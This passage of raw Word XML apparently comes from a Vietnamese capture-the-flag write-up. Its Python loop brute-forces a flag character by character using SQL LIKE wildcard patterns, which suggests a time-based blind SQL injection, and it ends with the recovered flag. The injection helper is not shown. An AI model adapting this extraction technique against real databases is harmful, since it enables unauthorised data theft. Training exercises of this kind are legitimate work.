      <w:r w:rsidRPr="007C415D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in</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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r</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"%_"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3542C2FB" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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7C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3EDDC4" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCE8616" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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BruteForce</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(f</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"%</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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{char}</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>%"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FAEAAF" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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7C415D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flag_characters</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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append</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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char</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750A1C9A" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="1FF848C4" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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print</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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flag_characters</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C54C2" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="5B1C49E0" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#Second round find the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B0771" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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flag</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44695790" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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True</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850FD2A" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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char</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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in</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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flag_characters</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D0387" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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7C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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BruteForce</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(f</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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{flag}{char}</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>%"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4D58FD" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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7C415D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flag</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> += </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5BC0FE" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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7C415D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print</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"Found the character:"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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char</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"Flag pice:"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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flag</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107BD71" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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7C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB8AEB" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D1E4E" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50745F" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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7C415D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print</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"No more character found"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D38C8" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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7C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC80314" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="202B1FD6" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#Print the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31711B1A" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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print</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"Flag:"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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flag</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B297D6D" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="6225A16E" w14:textId="2D2760F0" w:rsidR="007C415D" w:rsidRDefault="006801CE" w:rsidP="00512252">
      <w:r>
        <w:t>Ta có được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA64B3" w14:textId="0A61DE88" w:rsidR="007C415D" w:rsidRDefault="007C415D" w:rsidP="00512252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A2C332" wp14:editId="125D312B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14929366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9366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2891F" w14:textId="77777777" w:rsidR="00512252" w:rsidRDefault="00512252" w:rsidP="00512252">
      <w:r>
        <w:t>T!m3B@s3DSQL!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592C368" w14:textId="77777777" w:rsidR="00C54FA4" w:rsidRDefault="00C54FA4"/>
    <w:sectPr w:rsidR="00C54F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ira Code">
    <w:panose1 w:val="020B0809050000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00002EF" w:usb1="1201F9FB" w:usb2="02002038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E11"/>
    <w:rsid w:val="00512252"/>
    <w:rsid w:val="005E5E11"/>
    <w:rsid w:val="006801CE"/>
    <w:rsid w:val="007C415D"/>
    <w:rsid w:val="00C54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BF941"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{419175A6-0525-45FD-9333-09D2A3015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225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938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0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0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4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272</Words>
  <Characters>1553</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>12</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Võ Anh Kiệt</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Võ Anh Kiệt</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-13T17:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-13T18:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>